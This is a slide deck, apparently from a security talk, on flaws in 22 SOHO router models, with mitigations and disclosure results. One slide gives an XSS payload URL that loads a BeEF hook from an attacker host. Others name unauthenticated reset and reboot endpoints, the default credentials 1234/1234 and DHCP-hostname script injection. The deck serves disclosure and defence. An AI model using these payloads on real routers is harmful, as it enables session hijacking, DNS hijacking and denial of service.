Destroying Router Security - NNC5ed
About us...
Destroying Router Security · NNC5ed 2
Meet our research group
• Álvaro Folgado Rueda · Independent Researcher
• José Antonio Rodríguez García · Independent Researcher
• Iván Sanz de Castro · Security Analyst at Wise Security Global
Main goals
Search for vulnerability issues
Explore innovative attack vectors
Develop exploiting tools
Build an audit methodology
Evaluate the current security level of routers
State of the art • Previous research
State of the art • Real world attacks - Example 1
State of the art • Real world attacks - Example 2
Common security problems • Services
• Too many. Mostly useless.
• Increase the attack surface
• Insecure
Common security problems • Default credentials
• Public and well-known for each model
• Not randomly generated
User / Password
• 1234 / 1234: 45%
• admin / admin: 27%
• [blank] / admin: 5%
• admin / password: 5%
• vodafone / vodafone: 18%
Common security problems • Default credentials
• Hardly ever modified by users
Users' response when asked about router passwords
Best-case scenario
“I don't remember what the password is. I have never changed it.”
* Gives you a post-it with the Wi-Fi password *
“Administrative password of... WHAT?”
“Oh!, so we have one of those (routers)?”
Worst-case scenario
Common security problems • Multiple user accounts
• Also with public default credentials
• Mostly useless for users
• Almost always hidden from end users
  • Passwords for these accounts are never changed
Bypass Authentication
• Allows unauthenticated attackers to carry out router configuration changes
• Locally and remotely
• Exploits:
  • Improper file permissions
  • Service misconfiguration
Bypass Authentication • Web configuration interface
• Permanent Denial of Service
  • By accessing /rebootinfo.cgi
• Reset to default configuration settings
  • By accessing /restoreinfo.cgi
• Router replies with either HTTP 400 (Bad Request) or HTTP 401 (Unauthorized)
  • But spamming gets the job done!
Video Demo #1
• Persistent DoS / Restore router to default settings without requiring authentication
Bypass Authentication • SMB
• Allows unauthenticated attackers to download the entire router filesystem
  • Including critical files such as /etc/passwd
• File modification is also possible
• Erroneous configuration of the wide links feature
Bypass Authentication • Twonky Media Server
• Allows unauthenticated attackers to manipulate the contents of the USB storage device hooked up to the router
  • Download / Modify / Delete / Upload files.
• Misconfiguration of the service
Cross Site Request Forgery
• Change any router configuration settings by sending a specific malicious link to the victim
• Main goal
  • DNS Hijacking
• Requires embedding login credentials in the malicious URL
  • Attack feasible if credentials have never been changed
• Google Chrome does not pop up a warning message
Cross Site Request Forgery • Suspicious link, isn't it?
• URL Shortening Services
• Create a malicious website
Persistent Cross Site Scripting
• Inject malicious script code within the web configuration interface
• Goals
  • Session Hijacking
  • Browser Infection
Persistent Cross Site Scripting • Browser Exploitation Framework is a great help
• Input field character length limitation
• BeEF hooks link to a more complex script file hosted by the attacker
http://1234:[email protected]/goform?param=<script src="http://NoIPDomain:3000/hook.js"></script>
Unauthenticated Cross Site Scripting
• Script code injection is performed locally without requiring any login process
• Send a DHCP Request PDU containing the malicious script within the hostname parameter
• The malicious script is injected within the Connected Clients (DHCP Leases) table
Unauthenticated Cross Site Scripting • Sometimes it is a little bit harder...
Unauthenticated Cross Site Scripting • Or even next level...
• But it works!
Privilege Escalation
• User without administrator rights is able to escalate privileges and become an administrator
• Shows why multiple user accounts are unsafe
Video Demo #2
• Privilege Escalation via FTP
Backdoor • Hidden administrator accounts
• Completely invisible to end users
• But allows attackers to change any configuration setting
Information Disclosure
• Obtain critical information without requiring any login process
  • WLAN password
  • Detailed list of currently connected clients
  • Hints about router's administrative password
  • Other critical configuration settings
Universal Plug and Play
• Enabled by default on several router models
• Allows applications to execute network configuration changes such as opening ports
• Extremely insecure protocol
  • Lack of an authentication process
  • Awful implementations
• Goals
  • Open critical ports for remote WAN hosts
  • Persistent Denial of Service
  • Carry out other configuration changes
Universal Plug and Play • Locally
• Miranda UPnP tool
Universal Plug and Play • Remotely
• Malicious SWF file
Attack vectors
• Locally
  • Attacker is connected to the victim's LAN either using an Ethernet cable or wirelessly
• Remotely
  • The attacker is outside of the victim's LAN
Social Engineering is your friend • For link-based remote attacks
• XSS, CSRF and UPnP
• Social Networks = Build the easiest botnet ever!
• Phishing emails = Targeted attacks
Live Demo #1
• DNS Hijacking via CSRF
Live Demo #2
• Bypass Authentication using SMB Symlinks
Live Demo #3
• Unauthenticated Cross Site Scripting via DHCP Request
Developed tools
Manufacturers' response
• Average 2-3 emails sent to each manufacturer
• Most of them unanswered... 6 months later
• Number of vulnerabilities fixed: 0
Responses: No reply: 7 · "Not our problem": 3 · Other: 1
Mitigations • For end users
• Change your router's administrative password
• Try to delete any other administrative account
  • At least, change their passwords
• Update the firmware...
  • ... after spamming your manufacturer to fix the vulnerabilities
• Do not trust shortened links
• Disable UPnP. It's evil
• Disable any other unused services
Mitigations • For manufacturers
• Listen to what security researchers have to say
• Do not include useless services
  • Especially for ISP SOHO routers
  • At least, make it feasible to completely shut them down
• Critical ports closed to WAN by default
  • At least: 21, 22, 23, 80 and 8000/8080
• Randomly generate user credentials
• Do not include multiple user accounts
• Avoid using unsafe protocols (HTTP, telnet and FTP)
• Design a safer alternative to UPnP
Mitigations • For manufacturers
• XSS
  • Check every input field within router's web interface
  • Sanitize DHCP hostname parameters
  • Content Security Policies
• CSRF
  • Tokens... that work
• Bypass Authentication & Information Disclosure
  • Check for improper file permissions and public debug messages
• Service-related
  • Check for possible wrong service configuration (e.g.: FTP, SMB)
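The DHCP hostname mitigation above, as an added example (not code from the talk or from any vendor's firmware): the Host Name option (option 12) is validated when the lease is recorded, and every value is HTML-escaped again when the Connected Clients table is rendered. The function names, the 63-byte limit, the "unknown" fallback and the sample inputs are assumptions made for this example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define HOSTNAME_MAX 63               /* assumed policy: one DNS label */
#define HOSTNAME_FALLBACK "unknown"   /* assumed placeholder for rejected names */

static int is_alnum_ascii(unsigned char c)
{
    return (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
           (c >= '0' && c <= '9');
}

/* Layer 1 (input): option 12 is length-prefixed raw bytes, so the whole
 * buffer is checked, embedded NULs included. Only letters, digits and '-'
 * are accepted, and the name must start and end with a letter or digit. */
int hostname_is_valid(const unsigned char *opt, size_t len)
{
    size_t i;

    if (opt == NULL || len == 0 || len > HOSTNAME_MAX)
        return 0;
    if (!is_alnum_ascii(opt[0]) || !is_alnum_ascii(opt[len - 1]))
        return 0;
    for (i = 0; i < len; i++)
        if (!is_alnum_ascii(opt[i]) && opt[i] != '-')
            return 0;
    return 1;
}

/* Store the name in a lease entry; anything invalid becomes the fallback. */
void lease_set_hostname(char out[HOSTNAME_MAX + 1],
                        const unsigned char *opt, size_t len)
{
    if (hostname_is_valid(opt, len)) {
        memcpy(out, opt, len);
        out[len] = '\0';
    } else {
        strcpy(out, HOSTNAME_FALLBACK);
    }
}

/* Layer 2 (output): escape HTML metacharacters before the value reaches the
 * page. Returns the escaped length, or -1 if dst is too small. */
int html_escape(char *dst, size_t dstsz, const char *src)
{
    size_t used = 0;

    if (dstsz == 0)
        return -1;
    for (; *src != '\0'; src++) {
        char one[2] = { *src, '\0' };
        const char *rep = one;
        size_t n;

        switch (*src) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        }
        n = strlen(rep);
        if (used + n + 1 > dstsz)
            return -1;
        memcpy(dst + used, rep, n);
        used += n;
    }
    dst[used] = '\0';
    return (int)used;
}

/* Render one Connected Clients row; returns its length or -1 on overflow. */
int render_lease_row(char *dst, size_t dstsz, const char *ip, const char *host)
{
    char esc_ip[64], esc_host[6 * HOSTNAME_MAX + 1];
    int n;

    if (html_escape(esc_ip, sizeof esc_ip, ip) < 0 ||
        html_escape(esc_host, sizeof esc_host, host) < 0)
        return -1;
    n = snprintf(dst, dstsz, "<tr><td>%s</td><td>%s</td></tr>", esc_ip, esc_host);
    return (n < 0 || (size_t)n >= dstsz) ? -1 : n;
}

int main(void)
{
    /* Constructed option 12 payloads, not captured traffic. */
    static const unsigned char good[] = "laptop-01";
    static const unsigned char bad[]  = "<script>alert(1)</script>";
    char name[HOSTNAME_MAX + 1], row[512];

    lease_set_hostname(name, good, sizeof good - 1);
    if (render_lease_row(row, sizeof row, "192.168.1.20", name) > 0)
        puts(row);
    lease_set_hostname(name, bad, sizeof bad - 1);   /* stored as "unknown" */
    if (render_lease_row(row, sizeof row, "192.168.1.21", name) > 0)
        puts(row);
    return 0;
}
```

Escaping at render time stays in place even though names are validated on input, so a value that reaches the table by another path is still displayed as text.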
Results • More than 60 vulnerabilities have been discovered
• 22 router models affected
• 11 manufacturers affected
Disclosed vulnerabilities per manufacturer (bar chart; series: Number of disclosed vulnerabilities, Number of affected routers)
Vulnerabilities by types
• XSS: 21%
• Unauthenticated XSS: 15%
• CSRF: 20%
• Denial of Service: 8%
• Privilege Escalation: 2%
• Information Disclosure: 3%
• Backdoor: 2%
• Bypass Authentication: 6%
• UPnP: 23%
| Router | XSS | Unauth. XSS | CSRF | DoS | Privilege Escalation | Info. Disclosure | Backdoor | Bypass Auth. | UPnP |
|---|---|---|---|---|---|---|---|---|---|
| Observa Telecom AW4062 | Vuln. | - | Vuln. | Vuln. | Vuln. | - | - | - | - |
| Comtrend WAP-5813n | Vuln. | - | Vuln. | - | - | - | - | - | Vuln. |
| Comtrend CT-5365 | Vuln. | Vuln. | Vuln. | - | - | - | - | - | Vuln. |
| D-Link DSL2750B | - | - | - | - | - | Vuln. | - | - | Vuln. |
| Belkin F5D7632-4 | - | - | Vuln. | Vuln. | - | - | - | - | Vuln. |
| Sagem LiveBox Pro 2 SP | Vuln. | - | - | - | - | - | - | - | Vuln. |
| Amper Xavi 7968/+ | - | Vuln. | - | - | - | - | - | - | Vuln. |
| Sagem F@st 1201 | - | Vuln. | - | - | - | - | - | - | - |
| Linksys WRT54GL | - | Vuln. | - | - | - | - | - | - | - |
| Observa Telecom RTA01N | Vuln. | Vuln. | Vuln. | Vuln. | - | - | Vuln. | - | Vuln. |
| Observa Telecom BHS-RTA | - | - | - | - | - | Vuln. | - | - | Vuln. |
| Observa Telecom VH4032N | Vuln. | - | Vuln. | - | - | - | - | Vuln. | Vuln. |
| Huawei HG553 | Vuln. | - | Vuln. | Vuln. | - | - | - | Vuln. | Vuln. |
| Huawei HG556a | Vuln. | Vuln. | Vuln. | Vuln. | - | - | - | Vuln. | Vuln. |
| Astoria ARV7510 | - | - | Vuln. | - | - | - | - | Vuln. | - |
| Amper ASL-26555 | Vuln. | Vuln. | Vuln. | - | - | - | - | Vuln. | |
| Comtrend AR-5387un | Vuln. | Vuln. | - | - | - | - | - | - | - |
| Netgear CG3100D | Vuln. | - | Vuln. | - | - | - | - | - | - |
| Comtrend VG-8050 | Vuln. | Vuln. | - | - | - | - | - | - | - |
| Zyxel P 660HW-B1A | Vuln. | - | Vuln. | - | - | - | - | - | - |
| Comtrend 536+ | - | - | - | - | - | - | - | - | Vuln. |
| D-Link DIR-600 | - | - | - | - | - | - | - | - | Vuln. |
Responsible Disclosure
Conclusion
• Has SOHO router security improved?
• Hell NO!
• Serious security problems
• Easy to exploit
• With huge impact
• Millions of users affected
• PLEASE, START FIXING SOHO ROUTER SECURITY
• NOW!
TL;DR
Álvaro Folgado Rueda · [email protected]
José A. Rodríguez García · [email protected]
Iván Sanz de Castro · [email protected]
Thank you! Q&A Time